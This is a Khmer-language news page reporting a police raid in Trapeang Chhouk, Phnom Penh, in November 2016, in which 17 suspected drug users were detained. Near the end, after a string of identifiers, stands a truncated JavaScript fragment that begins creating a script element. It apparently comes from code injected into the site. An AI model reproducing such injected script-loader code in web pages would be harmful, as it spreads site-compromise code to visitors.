Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ជនសង្ស័យ១៧នាក់ពាក់ព័ន្ធនិងគ្រឿងញៀនត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួន នៅចំនុចទីផ្សារគ្រឿងញៀនត្រពាំងឈូក

ភ្នំពេញ៖  ភូមិត្រពាំឈូក សង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ នេះគឺជាកន្លែងដែលល្បីឈ្មោះជាយូមកហើយៗប្រជាពលរដ្ឋស្ទើទូទាំប្រទេសទៅហើយដែលដឹងថាជាកន្លែសំបូរទៅដោយអ្នកប្រើប្រាស់ ជួញដូរ ចែក ចាយគ្រឿងញៀននិងល្បែង សុីសងដែលសមត្ថកិច្ចពាក់ព័ន្ធខ្លះធ្លាប់សារភាពថា ចុះចាញ់ ដោយសារមិនអាចបោសសំអាតបាន ព្រោះកន្លងមកសមត្ថកិច្ចគ្រប់ជំនាញបានខិតខំបង្ក្រាបទាំងយប់ទាំងថ្ងៃតែត្រពាំងឈូកនៅតែជាទីផ្សារចរាចរណ៍គ្រឿងញៀនដដែល។នៅយប់ថ្ងៃទី១០ខែវិច្ចិកា ឆ្នាំ២០១៦វេលាម៉ោង២១និង០០នាទីកំលាំងអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខ សហការជាមួយកម្លាំងចម្រុះរាជធានីភ្នំពេញ បានចុះបង្ក្រាបតំបន់ខាងលើហើយឃាត់បានជនសង្ស័យប្រើប្រាស់គ្រឿងញៀនចំនួន១៧នាក់និងដកហូតម៉ូតូពីរគ្រឿងនិងឧបករណ៍ប្រើប្រាស់គ្រឿងញៀនមួយចំនួន លោកវរសេនីយ៍ ម៉ក់ ហុង អធិការខណ្ឌនគរបាលខណ្ឌសែនសុខ បានមានប្រសាសថា ដោយមានបទបញ្ជារពីលោកអគ្គស្នងការរងនិងជាស្នងការរាជធានីភ្នំពេញនិងដោយមានការសំរបសំរួលពីព្រះរាជអាជ្ញរងនៃអយ្យការអមសាលា ដំបូងរាជធានីភ្នំពេញបាន បញ្ជាមកលោកអោយចុះសហការណ៍និងធ្វើរដ្ឋបាលនៅចំណុចខាងលើដែលជាតំបន់ស្មុកស្មាញទើបលោកដឹកនាំកំលាំងចុះមកបង្ក្រាបអោយដូចភ្លៀងរលឹមក្នុងនោះឃាត់ខ្លួនអ្នកសង្ស័យប្រើប្រាស់គ្រឿងញៀនបានចំនួន១៧នាក់  ដកហូតម៉ូតូពីរគ្រឿង និងឧបករណ៍ប្រើប្រាស់គ្រឿងញៀនមួយចំនួនយកទៅសាកសួរនៅអធិការដ្ឋានខណ្ឌសែនសុខ។

 

គួរបញ្ជាក់ថាមួយរយះចុងក្រោយនេះនគរបាលខណ្ឌសែនសុខបានបើកយុទ្ធនាការអោយដូចភ្លៀងរកឹមដោយចុះជាប់គ្នាទាំយប់ទាំងថ្ងៃតែម្តងនិងបានប្រមូលក្រុមក្មេងដែរតែងតែដើរចោរផ្ទះមកប្រមូលផ្តុំប្រើប្រាស់គ្រឿងញៀននិងខ្លះមកលេងល្បែងសុីសងខុសច្បាប់ជាច្រើននាក់ បច្ចុប្បន្នក្រុមអ្នកសង្ស័យប្រើប្រាស់គ្រឿងញៀនរួមទាំងវត្ថុ តាងខាងលើត្រូវបាននាំខ្លួនយកទៅធ្វើការសាកសួរនៅអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខ។

0bdfdc58-7e00-480a-93e2-1a45c7a2942d 4a360bcf-d70a-424d-8b75-3fa8c12365a2 5bdd6b85-7dbe-4d04-9b2d-b9a0a826a159 c9d6c720-839e-44a3-a30d-edc154f5ac05 dc3262f5-94bf-4a35-9867-82ff8724215bvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More